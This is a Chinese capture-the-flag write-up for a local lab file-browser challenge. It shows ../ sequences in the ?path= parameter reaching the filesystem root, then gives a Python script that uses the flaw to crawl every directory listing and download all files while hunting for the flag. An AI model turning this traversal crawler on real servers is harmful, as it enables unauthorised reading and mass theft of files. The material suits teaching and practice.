垫刀之路04_一个文件浏览器
垫刀之路04: 一个文件浏览器
先点一个路径
http://127.0.0.1:7489/?path=/src
?path=
?path= 参数存在路径遍历漏洞:尝试访问 ?path=../ 可行,说明服务端没有把请求的路径限制在预期的目录之内。
输入足够多的 ../ 即可到达根目录。
根目录http://127.0.0.1:7489/?path=../../../../
有一个flag
文件内容:
flag 不在这里哦,你可以换个地方找找。
位置不远,耐心一点
flag在127.0.0.1:1943/?path=../../../../tmp/flag
手动逐个目录翻找很难找到,所以用下面的脚本自动遍历目录并下载文件:
import os
import requests
from urllib.parse import urljoin
# Starting listing URL on the local lab instance. The ../ run in ?path= is
# the same one the write-up uses to reach the filesystem root.
base_url = "http://127.0.0.1:1943/?path=../../../.."
# URLs that have already been requested; traverse() checks this set so that
# the same listing is never fetched twice.
visited_urls: set = set()
# 定义一个函数,用于下载文件
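def download_file(url, path):
    """Fetch *url* and write the response body to *path*.

    Failures are printed and swallowed so that one bad file does not stop
    the caller's crawl. A response with an empty body is skipped and no
    file is created for it.

    Args:
        url: Address requested with HTTP GET (timeout=10).
        path: Local destination; a missing parent directory is created.
    """
    try:
        response = requests.get(url, timeout=10)
        response.raise_for_status()

        if not response.content:
            print(f"Warning: Empty content for {url}, skipping download.")
            return

        # os.makedirs("") raises FileNotFoundError, so only create a parent
        # directory when the path actually has one (a bare file name does not).
        parent = os.path.dirname(path)
        if parent:
            os.makedirs(parent, exist_ok=True)

        with open(path, 'wb') as f:
            f.write(response.content)
        print(f"Downloaded {url} to {path}")
    except requests.exceptions.Timeout:
        print(f"Request timed out for {url}")
    except requests.exceptions.RequestException as e:
        print(f"An error occurred while downloading {url}: {e}")
    except OSError as e:
        # The destination name comes from server-supplied links; a name that
        # cannot be written locally (empty, a directory, ...) must not abort
        # the whole run. Kept after RequestException, which is itself an
        # OSError subclass.
        print(f"Could not write {path}: {e}")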
# 定义一个函数,用于遍历目录
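def _local_name(file_url):
    """Return a flat local file name that keeps the remote directory parts."""
    from urllib.parse import parse_qs, urlsplit

    parts = urlsplit(file_url)
    # Listings are addressed through the ?path= query parameter; fall back to
    # the URL path when a link does not carry one.
    remote = parse_qs(parts.query).get('path', [parts.path])[0]
    # Drop empty, "." and ".." segments so the name can never point outside
    # the current directory, then join the rest so that e.g. /flag and
    # /tmp/flag no longer overwrite each other.
    segments = [
        seg for seg in remote.replace('\\', '/').split('/')
        if seg not in ('', '.', '..')
    ]
    return '_'.join(segments)


def traverse(url):
    """Walk the listing at *url* and download every file it links to.

    Each ``<a href>`` on the page is resolved against *url*. A link whose
    text contains ``' (Directory)'`` is followed recursively; any other link
    is downloaded into the current directory. URLs already seen (tracked in
    ``visited_urls``) are skipped. Request errors are printed, not raised.

    Args:
        url: Listing page to fetch with HTTP GET (timeout=10).
    """
    from urllib.parse import urlsplit

    if url in visited_urls:
        return
    visited_urls.add(url)

    try:
        response = requests.get(url, timeout=10)
        response.raise_for_status()

        from bs4 import BeautifulSoup
        soup = BeautifulSoup(response.text, 'html.parser')
        origin = urlsplit(url).netloc

        for link in soup.find_all('a', href=True):
            full_url = urljoin(url, link['href'])

            # hrefs are server-controlled and may point anywhere; stay on the
            # host under test instead of following or downloading off-host links.
            if urlsplit(full_url).netloc != origin:
                continue

            if ' (Directory)' in link.text:
                # NOTE: recursion depth follows the remote directory depth, and
                # visited_urls only stops a cycle that yields the same URL string.
                traverse(full_url)
                continue

            name = _local_name(full_url)
            if not name:
                # Nothing usable to name the file with (e.g. a link to the root).
                continue
            download_file(full_url, os.path.join('.', name))
    except requests.exceptions.Timeout:
        print(f"Request timed out for {url}")
    except requests.exceptions.RequestException as e:
        print(f"An error occurred while traversing {url}: {e}")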
# Start the crawl from base_url. This call sits at module level, so merely
# importing the file also runs it.
traverse(base_url)
运行后,脚本会把所有文件下载到当前目录,大概需要20分钟;下载完成后在这些文件中查找 flag。